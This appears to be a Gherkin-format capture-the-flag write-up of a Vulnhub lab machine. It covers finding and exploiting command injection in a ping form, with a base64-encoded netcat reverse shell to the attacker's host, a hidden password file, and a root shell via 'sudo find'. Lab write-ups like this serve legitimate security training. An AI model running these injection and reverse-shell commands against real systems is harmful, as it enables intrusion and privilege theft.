## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
   http://10.0.2.9
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection with root privileges
  Recommendation:
    Validate that the input is only a valid IP

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Virtual Box     | 6.1           |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | netcat          | v1.10-41.1+b1 |
    | arp-scan        | 1.9.7         |
    | nmap            | 7.80          |
    | dirb            | 2.22          |
    | python          | 2.7.18        |
  TOE information:
    Given a file "HL.ova"
    When I run it on Virtual Box
    Then I realize that the user is required to log in to the system
    And I turn off the virtual machine
    And I configure the network of HL VM and Kali VM
    Then I turn on the Kali VM and the HL VM
    And I proceed to look for the IPs of the networks with arp-scan
    And this can be seen in [evidence](img1.png)
    And I discover the IP of the HL VM for this case is
    """
    10.0.2.9
    """
    Then I scan with nmap the open ports of HL VM
    And I can see 1 open ports
    And this can be seen in [evidence](img2.png)

  Scenario: Normal use case
    Given the open port of HTTP
    When I search "http://10.0.2.9/" in Firefox
    Then I access to a web page
    And this can be seen in [evidence](img3.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I access to http://10.0.2.9/
    When I try to find other website routes running
    """
    dirb http://10.0.2.9 /usr/share/dirb/wordlists/big.txt -X .php
    """
    Then I can see that the site has a route in "superadmin.php"
    And this can be seen in [evidence](img4.png)
    When I search "http://10.0.2.9/superadmin.php" in Firefox
    Then I access to another web page
    And I can see an input that it asks me to enter an IP to ping
    When I enter "google.com" the website shows me the result of the ping
    And this can be seen in [evidence](img5.png)
    Then I try to run another command with ping entering "google.com | id"
    And I get the result of run the "id" command
    And this can be seen in [evidence](img6.png)
    Then I conclude that this input has command injection vulnerability

  Scenario: Exploitation
    Given I access to http://10.0.2.9/superadmin.php
    When I enter "localhost | cat superadmin.php"
    Then the website try to show me the code of "superadmin.php"
    But the browser try to run it as can be seen in [evidence](img7.png)
    Then I right click on the page and click on "View Page Source"
    And I can see the code of "superadmin.php"
    And I can see that the website restrict certain commands
    And this can be seen in [evidence](img8.png)
    Then I try to run commands in base64 for that they are not restricted
    And I try to run "ls" in base64 entering in the input
    """
    localhost | `echo 'bHM=' | base64 -d`
    """
    And the command is executed successfully
    And this can be seen in [evidence](img9.png)
    Then I try to get a reverse shell running "nc -nvlp 443" in Kali VM
    And I try to run the command "nc -e /bin/bash 10.0.2.15 443" in base64
    And I enter in the input of the website
    """
    localhost | `echo
    'bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDEwLjAuMi4xNSA0NDM=' | base64 -d`
    """
    Then I get a reverse shell and I run
    """
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    """
    And I get a shell TTY as can be seen in [evidence](img10.png)
    Then I navigate through many directories
    And I found the first flag in "/home/yash" which states
    """
    Due to some security issues,I have saved haclabs password in a hidden file.
    """
    And I run "find / -type f -user yash" to find some hidden file of this user
    And I see a file list of the user "yash"
    And this can be seen in [evidence](img11.png)
    Then I try to see the contain of the file ".passwd" running
    """
    cat /usr/share/hidden/.passwd
    """
    And I can see what is probably the password of user "haclabs"
    And I try to use this password against the user "haclabs" running
    """
    su haclabs
    """
    And I log in successfully
    When I try to run the cat command as root, I get a permission error
    But yes I can run find as root
    Then I try to get a shell as root using the find command
    """
    sudo /usr/bin/find . -exec /bin/sh \; -quit
    """
    And I run the cat command to the last flag that is in "/root"
    And I get
    """
    Congrats!!!You completed the challenege!
    """
    And this can be seen in [evidence](img12.png)

  Scenario: Remediation
    When I make that the website validates that the input is only a valid input
    And allow only ping execution
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.5/10 (High) - AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (Critical) - CR:L/IR:L/AR:L/MC:H/MI:H/MA:H/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-07
